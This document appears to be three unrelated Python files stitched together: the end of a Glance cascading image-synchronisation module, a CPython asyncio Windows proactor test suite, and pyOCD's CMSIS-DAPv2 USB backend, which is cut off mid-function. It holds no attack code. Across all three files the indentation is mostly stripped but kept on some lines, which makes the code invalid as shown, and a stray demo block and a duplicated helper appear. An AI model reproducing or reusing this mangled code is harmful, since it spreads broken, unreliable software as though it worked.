:param url: the location's url
:return:
"""
global _IMAGE_LOCS_MAP
    image_map = _IMAGE_LOCS_MAP.get(id)
if not image_map:
return
locs = image_map['locations'] or []
if not locs:
return
del_locs = [loc for loc in locs if loc['url'] == url]
if not del_locs:
return
locs.remove(del_locs[0])
def return_sync_location(id, url):
"""
    When a sync finishes, mark the location as no longer in use and decrement its usage count.
"""
global _IMAGE_LOCS_MAP
    image_map = _IMAGE_LOCS_MAP.get(id)
if not image_map:
return
locs = image_map['locations'] or []
if not locs:
return
    selected_locs = [loc for loc in locs if loc['url'] == url]
    if not selected_locs:
        return
    selected_locs[0]['is_using'] = 0
    selected_locs[0]['count'] -= 1
def choose_a_location(sync_f):
"""
    The decorator for sync methods that need a source location: it picks a
    location, retries with another one when the sync fails, and stops when no
    locations remain.
    :param sync_f: the sync function to wrap
    :return: the wrapped function
"""
def wrapper(*args, **kwargs):
_id = args[1]
_auth_token = args[2]
_image = create_self_glance_client(_auth_token).images.get(_id)
_url = get_copy_location_url(_image)
kwargs['src_image_url'] = _url
_sync_ok = False
while not _sync_ok:
try:
sync_f(*args, **kwargs)
_sync_ok = True
except Exception:
remove_invalid_location(_id, _url)
_url = get_copy_location_url(_image)
if not _url:
break
kwargs['src_image_url'] = _url
return wrapper
def get_image_servcie():
return ImageService
def create_glance_client(auth_token, url):
return clients(auth_token).glance(url=url)
def create_self_glance_client(auth_token):
return create_glance_client(auth_token,
s_utils.get_cascading_endpoint_url())
def create_restful_client(auth_token, url):
pieces = urlparse.urlparse(url)
return _create_restful_client(auth_token, pieces.netloc)
def create_self_restful_client(auth_token):
return create_restful_client(auth_token,
s_utils.get_cascading_endpoint_url())
def _create_restful_client(auth_token, url):
server, port = url.split(':')
try:
port = int(port)
except Exception:
port = 9292
conn = httplib.HTTPConnection(server.encode(), port)
image_service = get_image_servcie()
glance_client = image_service(conn, auth_token)
return glance_client
def get_mappings_from_image(auth_token, image_id):
client = create_self_glance_client(auth_token)
image = client.images.get(image_id)
locations = image.locations
if not locations:
return {}
return get_mappings_from_locations(locations)
def get_mappings_from_locations(locations):
mappings = {}
for loc in locations:
if s_utils.is_glance_location(loc['url']):
id = loc['metadata'].get('image_id')
if not id:
continue
ep_url = s_utils.create_ep_by_loc(loc)
mappings[ep_url] = id
# endpoints.append(utils.create_ep_by_loc(loc))
return mappings
class AuthenticationException(Exception):
pass
class ImageAlreadyPresentException(Exception):
pass
class ServerErrorException(Exception):
pass
class UploadException(Exception):
pass
class ImageService(object):
def __init__(self, conn, auth_token):
"""Initialize the ImageService.
conn: a httplib.HTTPConnection to the glance server
auth_token: authentication token to pass in the x-auth-token header
"""
self.auth_token = auth_token
self.conn = conn
def _http_request(self, method, url, headers, body,
ignore_result_body=False):
"""Perform an HTTP request against the server.
method: the HTTP method to use
url: the URL to request (not including server portion)
headers: headers for the request
body: body to send with the request
ignore_result_body: the body of the result will be ignored
Returns: a httplib response object
"""
if self.auth_token:
headers.setdefault('x-auth-token', self.auth_token)
LOG.debug(_('Request: %(method)s http://%(server)s:%(port)s'
'%(url)s with headers %(headers)s')
% {'method': method,
'server': self.conn.host,
'port': self.conn.port,
'url': url,
'headers': repr(headers)})
self.conn.request(method, url, body, headers)
response = self.conn.getresponse()
headers = self._header_list_to_dict(response.getheaders())
code = response.status
code_description = httplib.responses[code]
LOG.debug(_('Response: %(code)s %(status)s %(headers)s')
% {'code': code,
'status': code_description,
'headers': repr(headers)})
if code in [400, 500]:
raise ServerErrorException(response.read())
if code in [401, 403]:
raise AuthenticationException(response.read())
if code == 409:
raise ImageAlreadyPresentException(response.read())
if ignore_result_body:
# NOTE: because we are pipelining requests through a single HTTP
# connection, httplib requires that we read the response body
# before we can make another request. If the caller knows they
# don't care about the body, they can ask us to do that for them.
response.read()
return response
@staticmethod
def _header_list_to_dict(headers):
"""Expand a list of headers into a dictionary.
headers: a list of [(key, value), (key, value), (key, value)]
Returns: a dictionary representation of the list
"""
d = {}
for (header, value) in headers:
if header.startswith('x-image-meta-property-'):
prop = header.replace('x-image-meta-property-', '')
d.setdefault('properties', {})
d['properties'][prop] = value
else:
d[header.replace('x-image-meta-', '')] = value
return d
@staticmethod
def _dict_to_headers(d):
"""Convert a dictionary into one suitable for a HTTP request.
d: a dictionary
Returns: the same dictionary, with x-image-meta added to every key
"""
h = {}
for key in d:
if key == 'properties':
for subkey in d[key]:
if d[key][subkey] is None:
h['x-image-meta-property-%s' % subkey] = ''
else:
h['x-image-meta-property-%s' % subkey] = d[key][subkey]
else:
h['x-image-meta-%s' % key] = d[key]
return h
def add_location(self, image_uuid, path_val, metadata=None):
"""
add an actual location
"""
LOG.debug(_('call restful api to add location: url is %s' % path_val))
metadata = metadata or {}
url = '/v2/images/%s' % image_uuid
hdrs = {'Content-Type': 'application/openstack-images-v2.1-json-patch'}
body = []
value = {'url': path_val, 'metadata': metadata}
body.append({'op': 'add', 'path': '/locations/-', 'value': value})
return self._http_request('PATCH', url, hdrs, jsonutils.dumps(body))
def clear_locations(self, image_uuid):
"""
clear all the location infos, make the image status be 'queued'.
"""
LOG.debug(_('call restful api to clear image location: image id is %s'
% image_uuid))
url = '/v2/images/%s' % image_uuid
hdrs = {'Content-Type': 'application/openstack-images-v2.1-json-patch'}
body = []
body.append({'op': 'replace', 'path': '/locations', 'value': []})
return self._http_request('PATCH', url, hdrs, jsonutils.dumps(body))
class MetadataHelper(object):
def execute(self, auth_token, endpoint, action_name='CREATE',
image_id=None, **kwargs):
glance_client = create_glance_client(auth_token, endpoint)
if action_name.upper() == 'CREATE':
return self._do_create_action(glance_client, **kwargs)
if action_name.upper() == 'SAVE':
return self._do_save_action(glance_client, image_id, **kwargs)
if action_name.upper() == 'DELETE':
return self._do_delete_action(glance_client, image_id, **kwargs)
return None
@staticmethod
def _fetch_params(keys, **kwargs):
return tuple([kwargs.get(key, None) for key in keys])
def _do_create_action(self, glance_client, **kwargs):
body = kwargs['body']
new_image = glance_client.images.create(**body)
return new_image.id
def _do_save_action(self, glance_client, image_id, **kwargs):
keys = ['changes', 'removes', 'tags']
changes, removes, tags = self._fetch_params(keys, **kwargs)
if changes or removes:
glance_client.images.update(image_id,
remove_props=removes,
**changes)
if tags:
if tags.get('add', None):
added = tags.get('add')
for tag in added:
glance_client.image_tags.update(image_id, tag)
elif tags.get('delete', None):
removed = tags.get('delete')
for tag in removed:
glance_client.image_tags.delete(image_id, tag)
return glance_client.images.get(image_id)
def _do_delete_action(self, glance_client, image_id, **kwargs):
return glance_client.images.delete(image_id)
_task_queue = Queue.Queue(maxsize=150)
class SyncManagerV2():
MAX_TASK_RETRY_TIMES = 1
def __init__(self):
global _task_queue
self.mete_helper = MetadataHelper()
self.location_factory = l_factory()
self.store_factory = s_factory()
self.task_queue = _task_queue
self.task_handler = None
self.unhandle_task_list = []
self.periodic_add_id_list = []
self.periodic_add_done = True
self._load_glance_store_cfg()
self.ks_client = clients().keystone()
self.create_new_periodic_task = False
def _load_glance_store_cfg(self):
glance_store.setup_glance_stores()
def sync_image_metadata(self, image_id, auth_token, action, **kwargs):
if not action or CONF.sync.sync_strategy == 'None':
return
kwargs['image_id'] = image_id
if action == 'SAVE':
self.task_queue.put_nowait(TaskObject.get_instance('meta_update',
kwargs))
elif action == 'DELETE':
self.task_queue.put_nowait(TaskObject.get_instance('meta_remove',
kwargs))
@choose_a_location
def sync_image_data(self, image_id, auth_token, eps=None, **kwargs):
if CONF.sync.sync_strategy in ['None', 'nova']:
return
kwargs['image_id'] = image_id
cascading_ep = s_utils.get_cascading_endpoint_url()
kwargs['cascading_ep'] = cascading_ep
copy_url = kwargs.get('src_image_url', None)
if not copy_url:
            LOG.warn(_('No copy url found for image %s sync, exit.'),
image_id)
return
LOG.info(_('choose the copy url %s for sync image %s'),
copy_url, image_id)
if s_utils.is_glance_location(copy_url):
kwargs['copy_ep'] = s_utils.create_ep_by_loc_url(copy_url)
kwargs['copy_id'] = s_utils.get_id_from_glance_loc_url(copy_url)
else:
kwargs['copy_ep'] = cascading_ep
kwargs['copy_id'] = image_id
self.task_queue.put_nowait(TaskObject.get_instance('sync', kwargs))
def adding_locations(self, image_id, auth_token, locs, **kwargs):
if CONF.sync.sync_strategy == 'None':
return
for loc in locs:
if s_utils.is_glance_location(loc['url']):
if s_utils.is_snapshot_location(loc):
snapshot_ep = s_utils.create_ep_by_loc(loc)
snapshot_id = s_utils.get_id_from_glance_loc(loc)
snapshot_client = create_glance_client(auth_token,
snapshot_ep)
snapshot_image = snapshot_client.images.get(snapshot_id)
_pre_check_time = timeutils.utcnow()
                    _timeout = CONF.sync.snapshot_timeout
                    while not timeutils.is_older_than(_pre_check_time,
                                                      _timeout):
if snapshot_image.status == 'active':
break
                        LOG.debug(_('Check snapshot not active, wait for %i '
                                    'seconds.'
                                    % CONF.sync.snapshot_sleep_interval))
time.sleep(CONF.sync.snapshot_sleep_interval)
snapshot_image = snapshot_client.images.get(
snapshot_id)
if snapshot_image.status != 'active':
                        LOG.error(_('Snapshot did not become active before timeout.'))
return
kwargs['image_id'] = image_id
kwargs['snapshot_ep'] = snapshot_ep
kwargs['snapshot_id'] = snapshot_id
snapshot_task = TaskObject.get_instance('snapshot', kwargs)
self.task_queue.put_nowait(snapshot_task)
else:
LOG.debug(_('patch a normal location %s to image %s'
% (loc['url'], image_id)))
input = {'image_id': image_id, 'location': loc}
self.task_queue.put_nowait(TaskObject.get_instance('patch',
input))
def removing_locations(self, image_id, auth_token, locs):
if CONF.sync.sync_strategy == 'None':
return
locs = filter(lambda loc: s_utils.is_glance_location(loc['url']), locs)
if not locs:
return
input = {'image_id': image_id, 'locations': locs}
remove_locs_task = TaskObject.get_instance('locs_remove', input)
self.task_queue.put_nowait(remove_locs_task)
def clear_all_locations(self, image_id, auth_token, locs):
locs = filter(lambda loc: not s_utils.is_snapshot_location(loc), locs)
self.removing_locations(image_id, auth_token, locs)
def create_new_cascaded_task(self, last_run_time=None):
LOG.debug(_('new_cascaded periodic task has been created.'))
glance_client = create_self_glance_client(self.ks_client.auth_token)
filters = {'status': 'active'}
image_list = glance_client.images.list(filters=filters)
input = {}
run_images = {}
cascading_ep = s_utils.get_cascading_endpoint_url()
input['cascading_ep'] = cascading_ep
input['image_id'] = 'ffffffff-ffff-ffff-ffff-ffffffffffff'
all_ep_urls = s_utils.get_endpoints()
for image in image_list:
glance_urls = [loc['url'] for loc in image.locations
if s_utils.is_glance_location(loc['url'])]
lack_ep_urls = s_utils.calculate_lack_endpoints(all_ep_urls,
glance_urls)
if lack_ep_urls:
image_core_props = s_utils.get_core_properties(image)
run_images[image.id] = {'body': image_core_props,
'locations': lack_ep_urls}
if not run_images:
LOG.debug(_('No images need to sync to new cascaded glances.'))
input['images'] = run_images
return TaskObject.get_instance('periodic_add', input,
last_run_time=last_run_time)
@staticmethod
def _fetch_params(keys, **kwargs):
return tuple([kwargs.get(key, None) for key in keys])
def _get_candidate_path(self, auth_token, from_ep, image_id,
scheme='file'):
g_client = create_glance_client(auth_token, from_ep)
image = g_client.images.get(image_id)
locs = image.locations or []
for loc in locs:
if s_utils.is_glance_location(loc['url']):
continue
if loc['url'].startswith(scheme):
if scheme == 'file':
return loc['url'][len('file://'):]
return loc['url']
return None
def _do_image_data_copy(self, s_ep, d_ep, from_image_id, to_image_id,
candidate_path=None):
from_scheme, to_scheme = glance_store.choose_best_store_schemes(s_ep,
d_ep)
store_driver = self.store_factory.get_instance(from_scheme['name'],
to_scheme['name'])
from_params = from_scheme['parameters']
from_params['image_id'] = from_image_id
to_params = to_scheme['parameters']
to_params['image_id'] = to_image_id
from_location = self.location_factory.get_instance(from_scheme['name'],
**from_params)
to_location = self.location_factory.get_instance(to_scheme['name'],
**to_params)
return store_driver.copy_to(from_location, to_location,
candidate_path=candidate_path)
def _patch_cascaded_location(self, auth_token, image_id,
cascaded_ep, cascaded_id, action=None):
self_restful_client = create_self_restful_client(auth_token)
path = s_utils.generate_glance_location(cascaded_ep, cascaded_id)
        # Add the auth_token so this url can be visited; otherwise a 404 error occurs.
path += '?auth_token=1'
metadata = {'image_id': cascaded_id}
if action:
metadata['action'] = action
self_restful_client.add_location(image_id, path, metadata)
def meta_update(self, auth_token, cascaded_ep, image_id, **kwargs):
return self.mete_helper.execute(auth_token, cascaded_ep, 'SAVE',
image_id, **kwargs)
def meta_delete(self, auth_token, cascaded_ep, image_id):
return self.mete_helper.execute(auth_token, cascaded_ep, 'DELETE',
image_id)
def sync_image(self, auth_token, copy_ep=None, to_ep=None,
copy_image_id=None, cascading_image_id=None, **kwargs):
        # First, create an image object with the cascading image's properties.
LOG.debug(_('create an image metadata in ep: %s'), to_ep)
cascaded_id = self.mete_helper.execute(auth_token, to_ep,
**kwargs)
try:
c_path = self._get_candidate_path(auth_token, copy_ep,
copy_image_id)
LOG.debug(_('Chose candidate path: %s from ep %s'), c_path, copy_ep)
# execute copy operation to copy the image data.
copy_image_loc = self._do_image_data_copy(copy_ep,
to_ep,
copy_image_id,
cascaded_id,
candidate_path=c_path)
LOG.debug(_('Sync image data, synced loc is %s'), copy_image_loc)
# patch the copied image_data to the image
glance_client = create_restful_client(auth_token, to_ep)
glance_client.add_location(cascaded_id, copy_image_loc)
# patch the glance location to cascading glance
msg = _("patch glance location to cascading image, with cascaded "
"endpoint : %s, cascaded id: %s, cascading image id: %s." %
(to_ep, cascaded_id, cascading_image_id))
LOG.debug(msg)
self._patch_cascaded_location(auth_token,
cascading_image_id,
to_ep,
cascaded_id,
action='upload')
return cascaded_id
except exception.SyncStoreCopyError as e:
LOG.error(_("Exception occurs when syncing store copy."))
raise exception.SyncServiceOperationError(reason=e.msg)
def do_snapshot(self, auth_token, snapshot_ep, cascaded_ep,
snapshot_image_id, cascading_image_id, **kwargs):
return self.sync_image(auth_token, copy_ep=snapshot_ep,
to_ep=cascaded_ep, copy_image_id=snapshot_image_id,
cascading_image_id=cascading_image_id, **kwargs)
def patch_location(self, image_id, cascaded_id, auth_token, cascaded_ep,
location):
g_client = create_glance_client(auth_token, cascaded_ep)
cascaded_image = g_client.images.get(cascaded_id)
glance_client = create_restful_client(auth_token, cascaded_ep)
try:
glance_client.add_location(cascaded_id, location['url'])
if cascaded_image.status == 'queued':
self._patch_cascaded_location(auth_token,
image_id,
cascaded_ep,
cascaded_id,
action='patch')
        except Exception:
            pass
def remove_loc(self, cascaded_id, auth_token, cascaded_ep):
glance_client = create_glance_client(auth_token, cascaded_ep)
glance_client.images.delete(cascaded_id)
def start(self):
        # Launch a new thread to read tasks from the task queue and handle them.
_thread = threading.Thread(target=self.tasks_handle)
_thread.setDaemon(True)
_thread.start()
def tasks_handle(self):
while True:
_task = self.task_queue.get()
if not isinstance(_task, TaskObject):
                LOG.error(_('Task type is not valid.'))
continue
            LOG.debug(_('Task starts to run, task id is %s' % _task.id))
_task.start_time = timeutils.strtime()
self.unhandle_task_list.append(copy.deepcopy(_task))
eventlet.spawn(_task.execute, self, self.ks_client.auth_token)
def handle_tasks(self, task_result):
t_image_id = task_result.get('image_id')
t_type = task_result.get('type')
t_start_time = task_result.get('start_time')
t_status = task_result.get('status')
handling_tasks = filter(lambda t: t.image_id == t_image_id and
t.start_time == t_start_time,
self.unhandle_task_list)
if not handling_tasks or len(handling_tasks) > 1:
            LOG.error(_('The task does not exist or is duplicated, cannot handle it. '
'Info is image: %(id)s, op_type: %(type)s, run time: '
'%(time)s'
% {'id': t_image_id,
'type': t_type,
'time': t_start_time}
))
return
task = handling_tasks[0]
self.unhandle_task_list.remove(task)
if isinstance(task, PeriodicTask):
LOG.debug(_('The periodic task executed done, with op %(type)s '
'runs at time: %(start_time)s, the status is '
'%(status)s.' %
{'type': t_type,
'start_time': t_start_time,
'status': t_status
}))
else:
if t_status == 'terminal':
                LOG.debug(_('The task executed successfully for image:'
'%(image_id)s with op %(type)s, which runs '
'at time: %(start_time)s' %
{'image_id': t_image_id,
'type': t_type,
'start_time': t_start_time
}))
elif t_status == 'param_error':
                LOG.error(_('The task failed due to a parameter error. Image:'
'%(image_id)s with op %(type)s, which runs '
'at time: %(start_time)s' %
{'image_id': t_image_id,
'type': t_type,
'start_time': t_start_time
}))
elif t_status == 'error':
LOG.error(_('The task failed to execute. Detail info is: '
'%(image_id)s with op %(op_type)s run_time:'
'%(start_time)s' %
{'image_id': t_image_id,
'op_type': t_type,
'start_time': t_start_time
}))
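# Hedged sketch exercising the location-selection cache defined above with a
# stand-in image object; _FakeImage and its urls are illustrative only.
if __name__ == '__main__':
    class _FakeImage(object):
        def __init__(self, image_id, urls):
            self.id = image_id
            self.locations = [{'url': url} for url in urls]
    _image = _FakeImage('fake-id', ['http://ep1/img', 'http://ep2/img'])
    _first = get_copy_location_url(_image)   # caches and returns the first url
    _second = get_copy_location_url(_image)  # returns the second, not-yet-used url
    return_sync_location(_image.id, _first)  # mark the first url as free again
    print('chose %s then %s' % (_first, _second))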
|
test_windows_events.py
|
import os
import signal
import socket
import sys
import time
import threading
import unittest
from unittest import mock
if sys.platform != 'win32':
raise unittest.SkipTest('Windows only')
import _overlapped
import _winapi
import asyncio
from asyncio import windows_events
from asyncio.streams import _StreamProtocol
from test.test_asyncio import utils as test_utils
def tearDownModule():
asyncio.set_event_loop_policy(None)
class UpperProto(asyncio.Protocol):
def __init__(self):
self.buf = []
def connection_made(self, trans):
self.trans = trans
def data_received(self, data):
self.buf.append(data)
if b'\n' in data:
self.trans.write(b''.join(self.buf).upper())
self.trans.close()
class ProactorLoopCtrlC(test_utils.TestCase):
def test_ctrl_c(self):
def SIGINT_after_delay():
time.sleep(0.1)
signal.raise_signal(signal.SIGINT)
thread = threading.Thread(target=SIGINT_after_delay)
loop = asyncio.get_event_loop()
try:
            # only start the thread once the event loop is running
loop.call_soon(thread.start)
loop.run_forever()
self.fail("should not fall through 'run_forever'")
except KeyboardInterrupt:
pass
finally:
self.close_loop(loop)
thread.join()
class ProactorMultithreading(test_utils.TestCase):
def test_run_from_nonmain_thread(self):
finished = False
async def coro():
await asyncio.sleep(0)
def func():
nonlocal finished
loop = asyncio.new_event_loop()
loop.run_until_complete(coro())
finished = True
thread = threading.Thread(target=func)
thread.start()
thread.join()
self.assertTrue(finished)
class ProactorTests(test_utils.TestCase):
def setUp(self):
super().setUp()
self.loop = asyncio.ProactorEventLoop()
self.set_event_loop(self.loop)
def test_close(self):
a, b = socket.socketpair()
trans = self.loop._make_socket_transport(a, asyncio.Protocol())
f = asyncio.ensure_future(self.loop.sock_recv(b, 100), loop=self.loop)
trans.close()
self.loop.run_until_complete(f)
self.assertEqual(f.result(), b'')
b.close()
def test_double_bind(self):
ADDRESS = r'\\.\pipe\test_double_bind-%s' % os.getpid()
server1 = windows_events.PipeServer(ADDRESS)
with self.assertRaises(PermissionError):
windows_events.PipeServer(ADDRESS)
server1.close()
def test_pipe(self):
res = self.loop.run_until_complete(self._test_pipe())
self.assertEqual(res, 'done')
async def _test_pipe(self):
ADDRESS = r'\\.\pipe\_test_pipe-%s' % os.getpid()
with self.assertRaises(FileNotFoundError):
await self.loop.create_pipe_connection(
asyncio.Protocol, ADDRESS)
[server] = await self.loop.start_serving_pipe(
UpperProto, ADDRESS)
self.assertIsInstance(server, windows_events.PipeServer)
clients = []
for i in range(5):
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
loop=self.loop, _asyncio_internal=True)
protocol = _StreamProtocol(stream,
loop=self.loop,
_asyncio_internal=True)
trans, proto = await self.loop.create_pipe_connection(
lambda: protocol, ADDRESS)
self.assertIsInstance(trans, asyncio.Transport)
self.assertEqual(protocol, proto)
clients.append((stream, trans))
for i, (r, w) in enumerate(clients):
w.write('lower-{}\n'.format(i).encode())
for i, (r, w) in enumerate(clients):
response = await r.readline()
self.assertEqual(response, 'LOWER-{}\n'.format(i).encode())
w.close()
await r.close()
server.close()
with self.assertRaises(FileNotFoundError):
await self.loop.create_pipe_connection(
asyncio.Protocol, ADDRESS)
return 'done'
def test_connect_pipe_cancel(self):
exc = OSError()
exc.winerror = _overlapped.ERROR_PIPE_BUSY
with mock.patch.object(_overlapped, 'ConnectPipe',
side_effect=exc) as connect:
coro = self.loop._proactor.connect_pipe('pipe_address')
task = self.loop.create_task(coro)
# check that it's possible to cancel connect_pipe()
task.cancel()
with self.assertRaises(asyncio.CancelledError):
self.loop.run_until_complete(task)
def test_wait_for_handle(self):
event = _overlapped.CreateEvent(None, True, False, None)
self.addCleanup(_winapi.CloseHandle, event)
# Wait for unset event with 0.5s timeout;
# result should be False at timeout
fut = self.loop._proactor.wait_for_handle(event, 0.5)
start = self.loop.time()
done = self.loop.run_until_complete(fut)
elapsed = self.loop.time() - start
self.assertEqual(done, False)
self.assertFalse(fut.result())
# bpo-31008: Tolerate only 450 ms (at least 500 ms expected),
# because of bad clock resolution on Windows
self.assertTrue(0.45 <= elapsed <= 0.9, elapsed)
_overlapped.SetEvent(event)
# Wait for set event;
# result should be True immediately
fut = self.loop._proactor.wait_for_handle(event, 10)
start = self.loop.time()
done = self.loop.run_until_complete(fut)
elapsed = self.loop.time() - start
self.assertEqual(done, True)
self.assertTrue(fut.result())
self.assertTrue(0 <= elapsed < 0.3, elapsed)
# asyncio issue #195: cancelling a done _WaitHandleFuture
# must not crash
fut.cancel()
def test_wait_for_handle_cancel(self):
event = _overlapped.CreateEvent(None, True, False, None)
self.addCleanup(_winapi.CloseHandle, event)
# Wait for unset event with a cancelled future;
# CancelledError should be raised immediately
fut = self.loop._proactor.wait_for_handle(event, 10)
fut.cancel()
start = self.loop.time()
with self.assertRaises(asyncio.CancelledError):
self.loop.run_until_complete(fut)
elapsed = self.loop.time() - start
self.assertTrue(0 <= elapsed < 0.1, elapsed)
# asyncio issue #195: cancelling a _WaitHandleFuture twice
# must not crash
fut = self.loop._proactor.wait_for_handle(event)
fut.cancel()
fut.cancel()
class WinPolicyTests(test_utils.TestCase):
def test_selector_win_policy(self):
async def main():
self.assertIsInstance(
asyncio.get_running_loop(),
asyncio.SelectorEventLoop)
old_policy = asyncio.get_event_loop_policy()
try:
asyncio.set_event_loop_policy(
asyncio.WindowsSelectorEventLoopPolicy())
asyncio.run(main())
finally:
asyncio.set_event_loop_policy(old_policy)
def test_proactor_win_policy(self):
async def main():
self.assertIsInstance(
asyncio.get_running_loop(),
asyncio.ProactorEventLoop)
old_policy = asyncio.get_event_loop_policy()
try:
asyncio.set_event_loop_policy(
asyncio.WindowsProactorEventLoopPolicy())
asyncio.run(main())
finally:
asyncio.set_event_loop_policy(old_policy)
if __name__ == '__main__':
unittest.main()
|
pyusb_v2_backend.py
|
# pyOCD debugger
# Copyright (c) 2019 Arm Limited
# SPDX-License-Identifier: Apache-2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from .interface import Interface
from .common import (filter_device_by_class, is_known_cmsis_dap_vid_pid)
from ..dap_access_api import DAPAccessIntf
from ... import common
import logging
import os
import threading
import six
from time import sleep
import errno
import platform
LOG = logging.getLogger(__name__)
try:
import usb.core
import usb.util
except:
IS_AVAILABLE = False
else:
IS_AVAILABLE = True
def match_cmsis_dap_interface_name(desc):
    """! @brief Return True if the interface descriptor's name contains "CMSIS-DAP".
    Module-level helper used by PyUSBv2.open(); mirrors the nested matcher in
    HasCmsisDapv2Interface.__call__ below.
    """
    interface_name = usb.util.get_string(desc.device, desc.iInterface)
    return (interface_name is not None) and ("CMSIS-DAP" in interface_name)
class PyUSBv2(Interface):
"""!
@brief CMSIS-DAPv2 interface using pyUSB.
"""
isAvailable = IS_AVAILABLE
def __init__(self):
super(PyUSBv2, self).__init__()
self.ep_out = None
self.ep_in = None
self.ep_swo = None
self.dev = None
self.intf_number = None
self.serial_number = None
self.kernel_driver_was_attached = False
self.closed = True
self.thread = None
self.rx_stop_event = None
self.swo_thread = None
self.swo_stop_event = None
self.rcv_data = []
self.swo_data = []
self.read_sem = threading.Semaphore(0)
self.packet_size = 512
self.is_swo_running = False
@property
def has_swo_ep(self):
return self.ep_swo is not None
def open(self):
assert self.closed is True
# Get device handle
dev = usb.core.find(custom_match=HasCmsisDapv2Interface(self.serial_number))
if dev is None:
raise DAPAccessIntf.DeviceError("Device %s not found" %
self.serial_number)
# get active config
config = dev.get_active_configuration()
# Get CMSIS-DAPv2 interface
interface = usb.util.find_descriptor(config, custom_match=match_cmsis_dap_interface_name)
if interface is None:
raise DAPAccessIntf.DeviceError("Device %s has no CMSIS-DAPv2 interface" %
self.serial_number)
interface_number = interface.bInterfaceNumber
# Find endpoints. CMSIS-DAPv2 endpoints are in a fixed order.
try:
ep_out = interface.endpoints()[0]
ep_in = interface.endpoints()[1]
ep_swo = interface.endpoints()[2] if len(interface.endpoints()) > 2 else None
except IndexError:
raise DAPAccessIntf.DeviceError("CMSIS-DAPv2 device %s is missing endpoints" %
self.serial_number)
# Explicitly claim the interface
try:
usb.util.claim_interface(dev, interface_number)
except usb.core.USBError as exc:
raise six.raise_from(DAPAccessIntf.DeviceError("Unable to open device"), exc)
# Update all class variables if we made it here
self.ep_out = ep_out
self.ep_in = ep_in
self.ep_swo = ep_swo
self.dev = dev
self.intf_number = interface_number
# Start RX thread as the last step
self.closed = False
self.start_rx()
def start_rx(self):
# Flush the RX buffers by reading until timeout exception
try:
while True:
self.ep_in.read(self.ep_in.wMaxPacketSize, 1)
except usb.core.USBError:
# USB timeout expected
pass
# Start RX thread
self.rx_stop_event = threading.Event()
thread_name = "CMSIS-DAP receive (%s)" % self.serial_number
self.thread = threading.Thread(target=self.rx_task, name=thread_name)
self.thread.daemon = True
self.thread.start()
def start_swo(self):
self.swo_stop_event = threading.Event()
thread_name = "SWO receive (%s)" % self.serial_number
self.swo_thread = threading.Thread(target=self.swo_rx_task, name=thread_name)
self.swo_thread.daemon = True
self.swo_thread.start()
self.is_swo_running = True
def stop_swo(self):
self.swo_stop_event.set()
self.swo_thread.join()
self.swo_thread = None
self.swo_stop_event = None
self.is_swo_running = False
def rx_task(self):
try:
while not self.rx_stop_event.is_set():
self.read_sem.acquire()
if not self.rx_stop_event.is_set():
self.rcv_data.append(self.ep_in.read(self.ep_in.wMaxPacketSize, 10 * 1000))
finally:
# Set last element of rcv_data to None on exit
self.rcv_data.append(None)
def swo_rx_task(self):
try:
while not self.swo_stop_event.is_set():
try:
self.swo_data.append(self.ep_swo.read(self.ep_swo.wMaxPacketSize, 10 * 1000))
except usb.core.USBError:
pass
finally:
# Set last element of swo_data to None on exit
self.swo_data.append(None)
@staticmethod
def get_all_connected_interfaces():
"""! @brief Returns all the connected devices with a CMSIS-DAPv2 interface."""
# find all cmsis-dap devices
try:
all_devices = usb.core.find(find_all=True, custom_match=HasCmsisDapv2Interface())
except usb.core.NoBackendError:
common.show_no_libusb_warning()
return []
# iterate on all devices found
boards = []
for board in all_devices:
new_board = PyUSBv2()
new_board.vid = board.idVendor
new_board.pid = board.idProduct
new_board.product_name = board.product
new_board.vendor_name = board.manufacturer
new_board.serial_number = board.serial_number
boards.append(new_board)
return boards
def write(self, data):
"""! @brief Write data on the OUT endpoint."""
report_size = self.packet_size
if self.ep_out:
report_size = self.ep_out.wMaxPacketSize
for _ in range(report_size - len(data)):
data.append(0)
self.read_sem.release()
self.ep_out.write(data)
#logging.debug('sent: %s', data)
def read(self):
"""! @brief Read data on the IN endpoint."""
while len(self.rcv_data) == 0:
sleep(0)
if self.rcv_data[0] is None:
raise DAPAccessIntf.DeviceError("Device %s read thread exited unexpectedly" % self.serial_number)
return self.rcv_data.pop(0)
def read_swo(self):
# Accumulate all available SWO data.
data = bytearray()
while len(self.swo_data):
if self.swo_data[0] is None:
raise DAPAccessIntf.DeviceError("Device %s SWO thread exited unexpectedly" % self.serial_number)
data += self.swo_data.pop(0)
return data
def set_packet_count(self, count):
# No interface level restrictions on count
self.packet_count = count
def set_packet_size(self, size):
self.packet_size = size
def get_serial_number(self):
return self.serial_number
def close(self):
"""! @brief Close the USB interface."""
assert self.closed is False
if self.is_swo_running:
self.stop_swo()
self.closed = True
self.rx_stop_event.set()
self.read_sem.release()
self.thread.join()
assert self.rcv_data[-1] is None
self.rcv_data = []
self.swo_data = []
usb.util.release_interface(self.dev, self.intf_number)
usb.util.dispose_resources(self.dev)
self.ep_out = None
self.ep_in = None
self.ep_swo = None
self.dev = None
self.intf_number = None
self.thread = None
class HasCmsisDapv2Interface(object):
"""! @brief CMSIS-DAPv2 match class to be used with usb.core.find"""
def __init__(self, serial=None):
"""! @brief Create a new FindDap object with an optional serial number"""
self._serial = serial
def __call__(self, dev):
"""! @brief Return True if this is a CMSIS-DAPv2 device, False otherwise"""
# Check if the device class is a valid one for CMSIS-DAP.
if filter_device_by_class(dev.idVendor, dev.idProduct, dev.bDeviceClass):
return False
try:
def match_cmsis_dap_interface_name(desc):
interface_name = usb.util.get_string(desc.device, desc.iInterface)
return (interface_name is not None) and ("CMSIS-DAP" in interface_name)
config = dev.get_active_configuration()
cmsis_dap_interface = usb.util.find_descriptor(config, custom_match=match_cmsis_dap_interface_name)
except usb.core.USBError as error:
# Produce a more helpful error message if we get a permissions error on Linux.
if error.errno == errno.EACCES and platform.system() == "Linux":
msg = ("%s while trying to interrogate a USB device "
"(VID=%04x PID=%04x). This can probably be remedied with a udev rule. "
"See <https://github.com/mbedmicro/pyOCD/tree/master/udev> for help." %
(error, dev.idVendor, dev.idProduct))
# If we recognize this device as one that should be CMSIS-DAP, we can raise
# the level of the log message since it's almost certainly a permissions issue.
